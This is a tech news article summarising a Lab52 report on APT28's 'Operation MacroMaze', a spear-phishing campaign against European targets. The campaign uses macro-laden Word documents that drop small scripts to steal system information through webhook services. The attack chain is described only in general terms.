- APT28 (Fancy Bear) reportedly running “Operation MacroMaze” since Sept 2025
- Spear-phishing emails with macro-laden Word docs used to drop infostealers
- Attack chain relies on simple scripts and HTML, maximizing stealth and persistence
APT28, the infamous Russian state-sponsored hacking group also known as Fancy Bear, or Sofacy, has been observed targeting “specific entities” in Western and Central Europe with infostealers.
In a newly released report, security researchers Lab52 from S2 Grupo detailed “Operation MacroMaze”, which has been ongoing since at least late September 2025 through January 2026.
The campaign starts with a highly personalized spear-phishing email. The topics and contents vary, but they’re mostly related to diplomatic themes. In one instance, the researchers said they saw a slightly altered copy of official diplomatic agendas being distributed.
Word documents and macros
The emails would come with a macro-laden Microsoft Office Word document. Macros are small programs or scripts that can be created inside Microsoft Word to automate repetitive tasks. However, they were so heavily abused throughout the years that Microsoft disabled them by default, especially for files downloaded from the internet.
However, the attackers carefully designed the Word files around that fact, tricking victims into enabling macros and running the malicious code. Lab52 also said that the malware was designed to notify the attackers when the victim actually executes the file.
When they do that, they trigger a chain reaction that, instead of dropping a single infostealer malware variant, drops multiple small scripts and HTML templates.
These established persistence, reconstructed a command payload from downloaded fragments, collected basic system information, and exfiltrated the results via an auto-submitting HTML form.
"This campaign proves that simplicity can be powerful,” the researchers explained. “The attacker uses very basic tools (batch files, tiny VBS launchers and simple HTML) but arranges them with care to maximise stealth: Moving operations into hidden or off-screen browser sessions, cleaning up artifacts, and outsourcing both payload delivery and data exfiltration to widely used webhook services."
The group behind Operation MacroMaze, APT28, has been actively involved in Russia’s “Special Military Operation”, assaulting Ukrainian infrastructure, and its allies, as it takes the war against Ukraine into cyberspace.
Via The Hacker News
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.
